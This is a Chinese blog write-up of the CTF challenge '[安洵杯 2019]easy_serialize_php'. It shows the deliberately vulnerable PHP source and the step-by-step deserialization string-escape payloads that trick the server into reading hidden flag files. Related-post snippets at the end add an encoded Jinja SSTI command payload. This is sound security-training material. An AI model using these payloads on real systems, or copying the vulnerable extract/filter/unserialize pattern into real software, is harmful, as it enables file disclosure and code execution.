[wp][安洵杯 2019]easy_serialize_php

最新推荐文章于 2024-04-17 02:03:22 发布
原创 最新推荐文章于 2024-04-17 02:03:22 发布 · 237 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#php #服务器 #开发语言
本文介绍了在安洵杯2019比赛中遇到的一个PHP序列化漏洞。通过分析phpinfo获取到的线索,发现需要在get请求中构造特定的SESSION变量来解密并显示隐藏的flag。作者尝试了不同的payload,最终找到成功的方法,揭示了在处理序列化数据时需要注意的关键点。

[安洵杯 2019]easy_serialize_php

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

f=phpinfo 得到
d0g3_f1ag.php
ZDBnM19mMWFnLnBocA==

在get ?f=show_image下
随便赋值 echo一下序列化
在这里插入图片描述需要吞掉这一段
在这里插入图片描述

我一开始构造
_SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}
发现不行,对比网上别人的payload发现必须function这些才行
重新修改

_SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:8:"function";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

得到
flag in /d0g3_fllllllag

_SESSION[1] =flagflagflagflagflagphp&_SESSION[function]=";s:8:"function";s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

看到网上其他师傅们,$_SESSION[‘flag’]赋值,我尝试做一下

>>> b='";s:1:"1";s:8:"function";s:40:"'
>>> len(b)
31

需要吞掉31位(7个flag+1个php)
构造payload:

_SESSION[flagflagflagflagflagflagflagphp] =1&_SESSION[function]=";s:1:"1";s:8:"function";s:1:"a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

但是我发现,别人只用了这么短的句子解决,捂脸

_SESSION[flagphp]=;i:1;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

只用吞掉";s:44:

BUUCTF之[安洵 2019]easy_serialize_php--WP
weixin_51313108的博客
08-26 663
easy_serialize_php考点Write Up 考点 PHP中反序列化的对象逃逸 俩种过滤函数:关键词增加和关键词减少 反序列化对象的逃逸有俩种策略:1.值逃逸 2.键逃逸 键/值逃逸: 因为序列化的字符串是严格的,对应的格式不能错,比如s:4:“name”,那s:4就必须有一个字符串长度是4的否则就往后要。 并且反序列化会把多余的字符串当垃圾处理,在花括号内的就是正确的,花括号{}外的就都被扔掉。 Write Up $function = @$_GET['f']; function
[安洵 2019]easy_serialize_php
zxnimud5的专栏
09-13 227
上来就给源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSIO
2023年安洵_pwn_个人writeup
xy1458214551的博客
12-25 807
2023年安洵pwn题解
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 607
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
安洵2023wp - ukfc战队
qq_59700927的博客
06-11 2490
2. 根据消息头 "Server: Werkzeug/1.0.1 Python/3.11.3"、 "/eval"回显是列表格式等判断是 "python flask", 且 "/eval" 使用了 "os.listdir()"函数,5.再看 "/sEcR@t_n@Bodyknow.php" 传空参可以得到两个函数 "mysqli_query()" 和 "mysqli_fetch_all()", 试着写马传了一下, 然后sql日志写马。file=../app.py" 均被 "杂鱼"
安洵2023 web wp
m0_64348326的博客
06-11 702
4.当时做到这里,就想着如何提权root用户了,但是发现提供的mysql并不足以能够提权。5.进入界面看是个xml文档,一眼xml注入,直接抓get包到repeat,然后在下面添加payload,file访问页面flag即可。(因为写其他地方的话,无法访问,测试后发现只有当前页面可以,game.php也不行)。目录,发现pyc文件,该文件是python解释器将py文件编译后生成的字节码文件。,提示get传递cmd参数,查看页面列表,类似于根目录的情况。界面,提示要登陆,打开session解密一看,
[安洵 2019]easy_serialize_php WP
chizhaji的博客
02-25 338
[安洵 2019]easy_serialize_php 一这道题来学习一下php反序列化字符逃逸 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$i
[安洵 2019]easy_serialize_php 1——wp
qq_44402100的博客
07-23 153
easy_serialize_php 先给payload: _SESSION['flagphp']=;s:5:"guest";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";} 开始做题(这题是一道PHP反序列化逃逸) 一:审计代码发现phpinfo以及分析源码 为了帮助理解if($_SESSION){}这句特意执行了一次。 二、见下图可知,当传入新的s...
[安洵 2020]Normal SSTI详细解法(Unicode编码绕过)
2301_76690905的博客
11-07 1506
引用popen,查目录url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22os%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u006c\u0073\u0020\u002f%22)|等效于{{””.__class__}}
[CTF][安洵 2019]easy_serialize_php 1 -- 反序列化漏洞、反序列化字符逃逸
Gh0st_1n_The_Shell的博客
08-28 1974
[安洵 2019]easy_serialize_php 1 首先打开靶机,只有一个链接没有其他东西 目录爆破没有爆破出来东西,打开链接,发现给出了网站源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; retu
[安洵2019]easy_serialize_php
weixin_45808483的博客
12-09 3237
知识点 反序列化字符逃逸(替换后导致字符串变短) 题目链接 BUUCTF在线评测[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 审计代码 启动环境 打开题目是一段代码: <?php ​ $function = @$_GET['f']; ​ function filter($img){ //fileter过滤函数,将falg,php等过滤为空 $filter_arr = array('php','flag','p...
2023第六届安洵wp,2024年最新微信小程序趋势及前景
2401_83740129的博客
04-17 1028
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
2023第六届安洵wp,非科班面试之旅
碧海朝天素
04-05 501
找到这两段这两个解aes是flag3????
2024第六届安洵wp
2401_83974064的博客
04-11 1224
1.sub_4577E0函数主要函数都写在注释里面,获取输入长度,根据长度分配堆空间,将密文赋值,关键加密和比较等2.sub_45126F函数分析,sub_4521B5函数的作用:此函数使用输入的user对两段数据进行一个操作,后续这个 51c048 和 51c000会对输入加密,由于这个函数只有用户名输入正确就行没啥好分析的3.sub_451F08是加密输入的重点就是将密码和密码的长度赋值,进入sub_4522FA加密4.sub_4522FA函数分析,一次加密八字节一共加密两次,调用a2函数加密。
WriteUp-第六届安洵网络安全挑战赛-010101
weixin_43694227的博客
01-18 1064
WriteUp-第六届安洵网络安全挑战赛-010101
2023年第六届安洵网络安全挑战赛|MISC
zerorzeror的博客
12-25 1436
解压缩有3个文件,文件名“麦克斯的称号”,是文本文件,添加txt后缀,发现0宽字符。在线解0宽,获取隐藏文字。文本文件往下拉,发现提示信息。解压缩“嗨.zip",出现docx文件,改后缀名为zip,解压缩,发现文件,文件最后有一个特殊字符串,扔进工具分析。rot循环减4,发现提示,根据前面提示,写脚本生成密码字典。生成100多万组密码。爆破解压缩密码,解压缩得到flag。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 2462
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值